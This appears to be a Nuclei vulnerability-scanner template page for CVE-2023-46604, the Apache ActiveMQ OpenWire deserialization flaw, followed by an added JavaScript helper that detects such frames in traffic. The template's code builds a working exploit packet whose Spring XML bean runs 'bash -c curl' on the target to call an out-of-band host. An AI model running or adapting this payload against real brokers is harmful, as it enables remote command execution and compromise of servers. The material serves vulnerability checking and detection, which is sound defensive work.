
Apache ActiveMQ - Remote Code Execution

ID: CVE-2023-46604

Severity: critical

Author: Ice3man,Mzack9999,pdresearch

Tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev

Apache ActiveMQ is vulnerable to Remote Code Execution. The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.

id: CVE-2023-46604

info:
  name: Apache ActiveMQ - Remote Code Execution
  author: Ice3man,Mzack9999,pdresearch
  severity: critical
  description: |
    Apache ActiveMQ is vulnerable to Remote Code Execution. The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
    Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/10/27/5
    - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
    - https://github.com/X1r0z/ActiveMQ-RCE
    - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
    - https://paper.seebug.org/3058/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46604
    cwe-id: CWE-502
    epss-score: 0.97273
    epss-percentile: 0.99837
    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: activemq
    shodan-query:
      - product:"ActiveMQ OpenWire Transport"
      - cpe:"cpe:2.3:a:apache:activemq"
      - product:"activemq openwire transport"
  tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev

variables:
  prefix: "1f00000000000000000001010042"
  classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
  final: "{{prefix}}{{classname}}"

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m1 = require('nuclei/net');
      let m2 = require('nuclei/bytes');
      let b = m2.Buffer();
      let name=Host+':'+Port;
      let conn = m1.Open('tcp', name);
      let randomvar = '{{randstr}}'.toLowerCase();
      var Base64={encode: btoa}
      exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
      packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
      packet+=(exploit_xml.length).toString(16)
      packet+=(b.WriteString(exploit_xml)).Hex()
      conn.SendHex(packet);
      resp = conn.RecvString()
      randomvar
    args:
      Host: "{{Host}}"
      Port: "61616"
      oob: "{{interactsh-url}}"
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(interactsh_request, response)'
        condition: and
# digest: 4a0a004730450220015aef6147a0da147b6258f847cf88f453e15dd58e58ded3a402d32db5809baf02210089dd428cef028f5f34f6189beea2f550c0c66893aa9262338334bfb731bf0cd5:922c64590222798bb761d5b6d8e72950

This template is run with the Nuclei scanner to check a target ActiveMQ broker for this vulnerability. It is a network (OpenWire, TCP port 61616) template rather than an HTTP one, and it relies on an interactsh out-of-band callback to confirm a finding, so the scanning host needs outbound DNS/HTTP reachability.

$ nuclei -u "URL" -t "javascript/cves/2023/CVE-2023-46604.yaml"
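The template's `prefix`/`classname` variables encode an OpenWire ExceptionResponse whose Throwable class name is a Spring `XmlApplicationContext`; that class-name string is what a defender can key on in traffic captures or broker-side logging. The following is an added detection helper, not part of the Nuclei template: it decodes those hex variables and flags frames carrying that pattern, extracting the attacker-supplied config location as the indicator to log and block. It assumes the command-type values 0x1f (ExceptionResponse) and 0x10 (ConnectionError) and the Throwable layout visible in the template's hex (non-null flag, then `01 + len16 + bytes` for class name and message); the sample frames in the test are constructed.

```javascript
// Added detection helper (not the template's code). Flags OpenWire frames whose
// Throwable class is a Spring XmlApplicationContext, the pattern the
// CVE-2023-46604 probe above relies on. Assumed command types: 0x1f
// ExceptionResponse, 0x10 ConnectionError. Frames are given as hex without the
// 4-byte frame-length prefix, like the template's `final` variable.
const PREFIX_HEX = "1f00000000000000000001010042"; // template variable `prefix`
const CLASSNAME_HEX = // template variable `classname`
  "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e" +
  "436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401";

const SUSPICIOUS_CLASSES = [
  "org.springframework.context.support.ClassPathXmlApplicationContext",
  "org.springframework.context.support.FileSystemXmlApplicationContext",
];
const COMMAND_NAMES = { 0x10: "ConnectionError", 0x1f: "ExceptionResponse" };

function hexToAscii(hex) {
  return Buffer.from(hex, "hex").toString("latin1");
}

// Reads a marshalled OpenWire string at `off`: 0x01 non-null flag, 2-byte
// big-endian length, then the bytes. Returns null if the layout does not fit.
function readOpenWireString(buf, off) {
  if (off < 0 || off + 3 > buf.length || buf[off] !== 0x01) return null;
  const len = buf.readUInt16BE(off + 1);
  if (off + 3 + len > buf.length) return null;
  return { value: buf.toString("latin1", off + 3, off + 3 + len), next: off + 3 + len };
}

function inspectFrame(hex) {
  const buf = Buffer.from(hex, "hex");
  if (buf.length === 0) return { suspicious: false, command: "empty" };
  const type = buf[0];
  const result = { suspicious: false, command: COMMAND_NAMES[type] || `type 0x${type.toString(16)}` };
  for (const cls of SUSPICIOUS_CLASSES) {
    const idx = buf.indexOf(cls, 0, "latin1");
    if (idx < 3) continue;
    // The class name must sit in its own non-null flag + length envelope.
    const name = readOpenWireString(buf, idx - 3);
    if (!name || name.value !== cls) continue;
    // The "message" string that follows is the location of the attacker-hosted
    // Spring XML: the indicator worth logging and blocking.
    const message = readOpenWireString(buf, name.next);
    result.suspicious = true;
    result.throwableClass = cls;
    result.configLocation = message ? message.value : null;
    return result;
  }
  return result;
}
```

Run it over frames pulled from a capture of port 61616 traffic; a hit on a broker that is below the fixed versions listed above is an exploitation attempt, and the extracted location tells you where the payload was hosted.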
